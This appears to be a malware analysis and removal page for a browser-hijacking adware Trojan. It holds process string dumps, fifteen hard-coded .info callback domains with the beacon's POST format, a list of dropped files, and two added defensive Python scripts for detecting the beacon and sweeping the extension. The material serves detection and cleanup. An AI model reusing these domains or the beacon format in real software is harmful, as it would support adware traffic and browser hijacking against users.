<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" /><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" /><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" /></application></compatibility></assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
31912<9<
@mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
kernel32.dll
USER32.DLL
5.4.6.1
TMPS.EXE
1.3.4.3

wuauclt.exe_1968 (not among the processes the Trojan created, and no injection was recorded; the strings below are those of the stock Windows Update Agent 7.6.7600.256):

.text
`.data
.rsrc
@.reloc
wuauclt.pdb
GetProcessHeap
KERNEL32.dll
_wcmdln
_amsg_exit
msvcrt.dll
ntdll.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
USER32.dll
OLEAUT32.dll
SHLWAPI.dll
version="6.0.0.0"
name="Microsoft.Windows.windowsupdate.wuauclt"
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
name="Microsoft.Windows.Common-Controls"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel
wuaueng.dll
Error: 0xx. wuauclt handler: failed to spawn COM server
Error: 0xx. wuauclt handler: failed to load wuaueng
/ReportNow
/ShowWindowsUpdate
/CloseWindowsUpdate
wuauclt.exe failed to get proc address for UI export object with error %#lx
Failed to load %s with error %X
wucltui.dll
wucltux.dll
call RunAUClientUI on wucltui.dll/wucltux.dll
Ntdll.dll
WuSqm %ls session datapoint (id:%d) is incremented with dword %d.
wuauclt.exe is exiting with code 0xX
wuauclt.exe launched with command line %s
kernel32.dll
WUWeb
Report
7.6.7600.256
Global\WindowsUpdateTracingMutex
WindowsUpdate.log
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Trace
Windows
shell32.dll
%s: %s [
%s: %s
%s\%s
= Module: %s
= Module: <failed with %d>
= Process: %s
= Process: <failed with %d>
=========== Logging initialized (build: %s, tz: %s) ===========
wups2.dll
wups.dll
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Setup\ServiceStartup\
%hs %ls page "%ls", hr=%X
Microsoft.WindowsUpdate
wupdmgr.exe
Failed to cocreate IShellWindows, error = 0xlX
Failed to obtain window doc for window %d, error = 0xlX
Failed to obtain folder view for window %d, error = 0xlX
Failed to obtain folder IPersist for window %d, error = 0xlX
Window %d is NOT a WU window
Done enumerating windows
Quit for window %d failed: 0xlX
Window %d is a WU window. Attempting to close
Failed to obtain class ID for window %d, error = 0xlX
Got NULL disp interface for window %d
Got %d instead of VT_DISPATCH for window %d
Failed to obtain IWebBrowserApp for window %d, error = 0xlX
Failed to enumerate window %d, error = 0xlX
Found %d explorer windows
Closing WU explorer windows
Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\VolatileData
WUAppNotificationWindows
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\RebootRequired\Mandatory
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\PostRebootReporting
SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Services\Pending\
%chdhd
hd-hd-hd%chd:hd:hd:hd
%WinDir%
Windows Update
7.6.7600.256 (winmain_wtr_wsus3sp2(oobla).120602-1459)
wuauclt.exe
Windows
Operating System

4t0K2gExXKV.exe_496:

.text
`.rdata
@.data
.rsrc
@.reloc
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
()$^.*+?[]|\-{},:=!
dynamic load failed (x)
"%s"%s
^http[s]?://([^\/:\s]+)(:[^\/\s]+)?(\/?[^\s]*)$
\ux
GetProcessHeap
KERNEL32.dll
RegCreateKeyExW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
RegCloseKey
ADVAPI32.dll
GetCPInfo
/bi "legacy" /li 0 /ks 16   /path "$3\Assistant\Assistant.dll" /ax /sf /dn "Assistant" /sn "Assistant" /rp /rf /un /mf /xx /xy /rk "product_id" "Assistant" /pn "Verified Publisher" /id "0"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT %d.%d)
HTTP/
%s=%s
POST %s HTTP/1.1
Host: %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
%s=%s&version=4
foreverysun.info
proffidriversun.info
proffidrivergold.info
installdrivergold.info
installdrivermy.info
livedriverget.info
livedriverset.info
livedrivernet.info
drivernetuk.info
zillionnetuk.info
solutionnetuk.info
easyprobar.info
applicationfirst.info
applicationmyweb.info
%d-%d %d | %d.%d (%d) | x86
%d-%d %d | x86
skyprobar.info
def-1.80.1889 (primary) Feb 12 2014 19:33:02
hXXp://%s%s%s%c%s=%s&version=4
hXXp://%s%s%s&version=4
%Documents and Settings%\%current user%\Local Settings\Temp\4t0K2gExXKV.exe
?456789:;<=
!"#$%&'()*+,-./0123
'()*#$%&
>?:;<=9876540123,-./
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
kernel32.dll
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
portuguese-brazilian
USER32.DLL
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
USERENV.dll
%stfx.%s
%s/%s
[\^\.\$\|\(\)\[\]\{\}\*\+\?\/\\]
{5F189DF5-2D05-472B-9091-84D9848AE48B}
Global\u%s
ie:homepage_url
ie:search_url
ff:homepage_url
ff:search_url
chrome:homepage_url
chrome:search_txt
chrome:search_uid
chrome:search_url
chrome:search_ico
\x
SOFTWARE\%s\_x
SOFTWARE\AppDataLow\%s\_x
SOFTWARE\{77D46E27-0E41-4478-87A6-AABE6FBCF252}
{77D46E27-0E41-4478-87A6-AABE6FBCF252}
{6F944A3B-154F-402C-8FAF-31D78D2113A9}
{71F281B8-2705-429D-BA65-5BEF850D787F}
{6791A2F3-FC80-475C-A002-C014AF797E9C}
{3DAFC8E5-2505-41FF-ABFC-EAECF8DB46D4}
{F0A61307-94CD-4F8E-94BC-918E511FAA81}
{6577B558-0B3A-4BE1-A0BD-1BF7896B7DB2}
{8F19E417-2A17-4563-BDBE-6B0D502195A1}
{C4DA09F7-0BCF-4B03-8AE8-176907B19DF2}
SOFTWARE\%s
%s.%x
SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}\%s
IESearchUrl
surl
FirefoxHomepage
FirefoxSearchEngineName
FirefoxSearchEngineIcon
FirefoxSearchUrl
Chrome
ChromeHomepage
ChromeSearchEngineName
ChromeSearchEngineIcon
ChromeSearchUrl
ChromeSearchInstantUrl
iurl
RUNDLL32.EXE
%s\SYSTEM32\RUNDLL32.EXE
%s\RUNDLL32.EXE
x-x-x
\__tmp_x
.__tmp_x
Assistant$.dll
%s\uninstall.exe
%s.x
SOFTWARE\AppDataLow\%s
"%s" "%s",_uninstall
%s /un
%s /un /uq
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
X%ddd
U%ddd
SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
error: %s (v=x b='%s' p='%s')
ciexplore.exe
firefox.exe
chrome.exe
new_chrome.exe
u.exe
dragon.exe
torch.exe
Local\II%uII
;(\s|^)%s[^\s]*(\s|$)
%s\upd
%s\ini
chrome:search_fullname
chrome:search_url_instant
chrome:search_instanturl
global:tcp
WebPreserver
{771A53AF-D6BD-4B75-B7C1-D867456B810F}
{4A0F38A9-FE55-4B89-B73F-E60FDC0F72E9}
{1146AC44-2F03-4431-B4FD-889BC837521F}
{B18C20BD-78D5-4391-BA0E-1659E61868A4}
{4DDA0E6F-5543-440C-BAA2-28BF01070AFA}
{E9C8031E-4963-4D48-8F87-108A30FFB076}
{423A0A37-0BF2-4422-9C2E-83EF50FF4269}
{19CD3583-B687-4FAA-9DB7-A49814B018BF}
SOFTWARE\%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SProtector
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SP_%s
{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s{%s}
NTDLL.dll
\Internet Explorer\iexplore.exe
"%s" -k "%s"

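The strings at the head of the 4t0K2gExXKV.exe dump give the callback format almost completely: a POST with Content-Type application/x-www-form-urlencoded, the User-Agent template "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT %d.%d)", a query or body of the form "%s=%s&version=4", and fifteen hard-coded .info domains. The following is an added example, not part of the Lavasoft report, that turns those strings into a proxy-log check. The tab-separated log format and every line in the sample log are constructed for the demo. The User-Agent is exactly what a genuine IE7 sends, so the script treats it, the version=4 parameter and the form POST as weak indicators that only count together, while a listed domain (or a subdomain of one) is a match on its own.

```python
"""Flag proxy-log requests that match the callback indicators embedded in
4t0K2gExXKV.exe: its hard-coded .info domains, the IE7 User-Agent template
and the form-encoded POST whose parameters end in "&version=4".

Added example, not code from the Lavasoft report. The tab-separated log
format and every line in SAMPLE_PROXY_LOG are constructed for the demo.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Domains that appear as plain strings in the 4t0K2gExXKV.exe dump.
CALLBACK_DOMAINS = frozenset({
    "foreverysun.info", "proffidriversun.info", "proffidrivergold.info",
    "installdrivergold.info", "installdrivermy.info", "livedriverget.info",
    "livedriverset.info", "livedrivernet.info", "drivernetuk.info",
    "zillionnetuk.info", "solutionnetuk.info", "easyprobar.info",
    "applicationfirst.info", "applicationmyweb.info", "skyprobar.info",
})

# "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT %d.%d)" with the version filled in.
# A genuine IE7 sends exactly this, so on its own it is not an indicator.
UA_RE = re.compile(r"^Mozilla/4\.0 \(compatible; MSIE 7\.0; Windows NT \d+\.\d+\)$")


def host_is_callback(host):
    """True for a listed domain or any subdomain of one."""
    host = (host or "").lower().rstrip(".")
    return host in CALLBACK_DOMAINS or any(host.endswith("." + d) for d in CALLBACK_DOMAINS)


def request_indicators(method, url, user_agent, content_type, body):
    """Return the names of the indicators one request matches, strongest first."""
    hits = []
    parts = urlsplit(url)
    if host_is_callback(parts.hostname):
        hits.append("domain")
    if UA_RE.match(user_agent):
        hits.append("user_agent")
    # "%s=%s&version=4" is used both as a URL template and as the POST body template.
    if parse_qs(parts.query).get("version") == ["4"] or parse_qs(body).get("version") == ["4"]:
        hits.append("version=4")
    if method == "POST" and content_type.startswith("application/x-www-form-urlencoded"):
        hits.append("form_post")
    return hits


def verdict(hits):
    """A listed domain is a match by itself; the weak indicators only count together."""
    if "domain" in hits:
        return "match"
    if {"user_agent", "version=4", "form_post"}.issubset(hits):
        return "suspect"
    return None


def scan_proxy_log(lines):
    """Parse constructed tab-separated lines
         ts  client  method  url  status  user_agent  content_type  body
    ('-' marks an absent field) and return one record per flagged request."""
    flagged = []
    for n, line in enumerate(lines, 1):
        fields = [f if f != "-" else "" for f in line.rstrip("\n").split("\t")]
        if len(fields) != 8:
            continue                      # malformed line: skip it, do not abort the sweep
        ts, client, method, url, status, ua, ctype, body = fields
        hits = request_indicators(method, url, ua, ctype, body)
        v = verdict(hits)
        if v:
            flagged.append({"line": n, "time": ts, "client": client, "url": url,
                            "hits": hits, "verdict": v})
    return flagged


# Constructed sample: a beacon, a benign IE7 request, a look-alike POST to an
# unrelated host, and a GET to a listed domain from a non-IE client.
SAMPLE_PROXY_LOG = (
    "2014-11-09T04:20:07Z\t10.0.0.15\tPOST\thttp://foreverysun.info/\t200\t"
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\t"
    "application/x-www-form-urlencoded\tid=7e4c&version=4\n"
    "2014-11-09T04:20:09Z\t10.0.0.15\tGET\thttp://www.microsoft.com/\t200\t"
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\t-\t-\n"
    "2014-11-09T04:21:30Z\t10.0.0.22\tPOST\thttp://cdn.example.com/api?version=4\t200\t"
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1)\t"
    "application/x-www-form-urlencoded\tid=1\n"
    "2014-11-09T04:22:00Z\t10.0.0.31\tGET\thttp://skyprobar.info/cfg?u=abc&version=4\t200\t"
    "curl/7.30.0\t-\t-\n"
)

if __name__ == "__main__":
    for rec in scan_proxy_log(SAMPLE_PROXY_LOG.splitlines()):
        print(rec["verdict"], rec["client"], rec["url"], ",".join(rec["hits"]))
```

On the sample log the first line is reported as a match on all four indicators and the fourth as a match on the domain alone; the third line, a form POST with version=4 to an unrelated host, is only a suspect, and the benign IE7 request on line 2 is not reported at all. The domain list is the strongest signal here; the version=4 parameter and the IE7 User-Agent are worth alerting on only in combination.
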
rundll32.exe_892:

.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
There is not enough memory to run the file %s.
Please close other windows and try again.
The file %s or one of its components could not be opened.
The file %s or one of its components cannot run.
The file %s or one of its components requires a different version of Windows.
The file %s or one of its components cannot run in standard or enhanced mode Windows.
Another instance of the file %s is already running.
An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s
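The dropped-file list under Manual removal below shows the same Chromium extension ID, pclnmbgpjmkgjihmdggmkondchhibbmh, written into the Chrome, Chrome SxS, Comodo Dragon, Torch and Chromatic Browser profiles of every local account (Administrator, Guest, HelpAssistant, SUPPORT_388945a0 and the current user), together with a Firefox add-on and an unpacked staging copy under Temp\20182466; the browser process names and the ie:, ff: and chrome: homepage/search strings in the 4t0K2gExXKV.exe dump point the same way. Cleaning one profile is therefore not enough. The following added example, not code from the report, sweeps a profile root for every copy. The XP-style directory tree it scans in the demo is constructed in a temporary directory so the script runs offline; the Firefox add-on directory name is used exactly as this page renders it. On a real host call sweep() on C:\Documents and Settings (XP) or C:\Users.

```python
"""Sweep a profile root for every copy of the browser-extension payload this
sample drops: the Chromium extension pclnmbgpjmkgjihmdggmkondchhibbmh (installed
into Chrome, Chrome SxS, Comodo Dragon, Torch and Chromatic Browser profiles of
every local account), the Firefox add-on directory, and the unpacked staging
copy under Temp\\20182466.

Added example, not code from the Lavasoft report. demo() builds a constructed
XP-style tree in a temporary directory; on a real host call sweep() on
C:\\Documents and Settings (XP) or C:\\Users.
"""
import json
import os
import shutil
import tempfile

CHROMIUM_EXT_ID = "pclnmbgpjmkgjihmdggmkondchhibbmh"
FIREFOX_ADDON_ID = "[email protected]"   # directory name exactly as the report renders it


def read_manifest(path):
    """Return {"name", "version"} from a manifest.json, or None if it is missing or not JSON."""
    try:
        with open(path, encoding="utf-8") as fh:
            m = json.load(fh)
        return {"name": m.get("name"), "version": m.get("version")}
    except (OSError, ValueError):
        return None


def sweep(root):
    """Walk root and return one record per hit.

    user  first path element under root (the profile owner)
    kind  "chromium" (installed: <id>/<version>/manifest.json),
          "chromium-staging" (manifest.json directly inside <id>/) or "firefox"
    """
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        base = os.path.basename(dirpath)
        user = os.path.relpath(dirpath, root).split(os.sep)[0]
        if base == CHROMIUM_EXT_ID:
            if "manifest.json" in filenames:
                hits.append({"user": user, "kind": "chromium-staging", "path": dirpath,
                             "manifest": read_manifest(os.path.join(dirpath, "manifest.json"))})
            for ver in sorted(dirnames):
                manifest = os.path.join(dirpath, ver, "manifest.json")
                if os.path.isfile(manifest):
                    hits.append({"user": user, "kind": "chromium", "path": os.path.join(dirpath, ver),
                                 "manifest": read_manifest(manifest)})
            dirnames[:] = []          # the extension's own files need no further descent
        elif base == FIREFOX_ADDON_ID:
            hits.append({"user": user, "kind": "firefox", "path": dirpath, "manifest": None})
            dirnames[:] = []
    return hits


def build_demo_tree(root):
    """Constructed XP-style tree: two installed copies, one staging copy, one Firefox
    add-on and one unrelated extension that must not be reported."""
    manifest = json.dumps({"name": "constructed demo", "version": "2.1", "manifest_version": 2})
    lad = os.path.join("Local Settings", "Application Data")
    layout = {
        os.path.join("Administrator", lad, "Google", "Chrome", "User Data", "Default",
                     "Extensions", CHROMIUM_EXT_ID, "2.1", "manifest.json"): manifest,
        os.path.join("Guest", lad, "Torch", "User Data", "Default",
                     "Extensions", CHROMIUM_EXT_ID, "2.1", "manifest.json"): manifest,
        os.path.join("Administrator", "Local Settings", "Temp", "20182466",
                     CHROMIUM_EXT_ID, "manifest.json"): manifest,
        os.path.join("Administrator", "Local Settings", "Temp", "20182466",
                     FIREFOX_ADDON_ID, "install.rdf"): "<RDF/>",
        os.path.join("Guest", lad, "Google", "Chrome", "User Data", "Default",
                     "Extensions", "a" * 32, "1.0", "manifest.json"): manifest,
    }
    for rel, content in layout.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)


def demo():
    """Build the constructed tree, sweep it, remove it again, return the hits."""
    root = tempfile.mkdtemp(prefix="sweep-demo-")
    try:
        build_demo_tree(root)
        return sorted(sweep(root), key=lambda h: h["path"])
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for h in demo():
        print(h["user"], h["kind"], h["path"], h["manifest"])
```

The sweep only finds files. The list below also shows %System%\GroupPolicy\Machine\Registry.pol and gpt.ini being rewritten; if they carry a forced extension-install policy the extension returns on the next policy refresh, so inspect them before deleting the directories, and reset the homepage and search settings the ie:, ff: and chrome: strings refer to. tf00294823.dll, Supporter.dll and the SaveClicker files are separate components and are not covered by this check.
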


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1904
    qeO052T9N.exe:1356
    rundll32.exe:892
    rundll32.exe:1216
    regsvr32.exe:1944
    4t0K2gExXKV.exe:496
    gzfJ2GIHr9X.exe:1288

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\4t0K2gExXKV.exe (650324 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\qeO052T9N.exe (352986 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\install.rdf (607 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.x64.dll (6338 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\lsdb.js (531 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\content.js (144 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\content\bg.js (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.tlb (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\20182466\gzfJ2GIHr9X.exe (3863 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\20182466\vWxdeLnb7d.dll (3837 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\background.html (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\manifest.json (503 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\chrome.manifest (31 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\20182466\pclnmbgpjmkgjihmdggmkondchhibbmh\eKK1Ekpn.js (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\20182466\[email protected]\bootstrap.js (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\20182466\gzfJ2GIHr9X.dat (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (30622 bytes)
    %Program Files%\Supporter\Supporter.dll (272917 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHIRSTUV\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\G0RRGIZX\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\BYIBPPYK\desktop.ini (67 bytes)
    %Program Files%\Supporter\SupporterSvc.dll (180 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ZFJLCPJB\desktop.ini (67 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Program Files%\SaveClicker\vWxdeLnb7d.dat (260 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\All Users\Application Data\SaveClicker\gzfJ2GIHr9X.dat (260 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\background.html (145 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\eKK1Ekpn.js (262 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\SUPPORT_388945a0\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Chromatic Browser\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\content.js (144 bytes)
    %Documents and Settings%\All Users\Application Data\f362fc35c4a3dbfb\{1E092842-7999-DA0B-FC97-9FCE3FB05A56}.20141109042007 (186 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Torch\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\Guest\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\manifest.json (759 bytes)
    %Documents and Settings%\HelpAssistant\Local Settings\Application Data\Comodo\Dragon\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
    %Documents and Settings%\Administrator\Local Settings\Application Data\Google\Chrome SxS\User Data\Default\Extensions\pclnmbgpjmkgjihmdggmkondchhibbmh\2.1\lsdb.js (787 bytes)
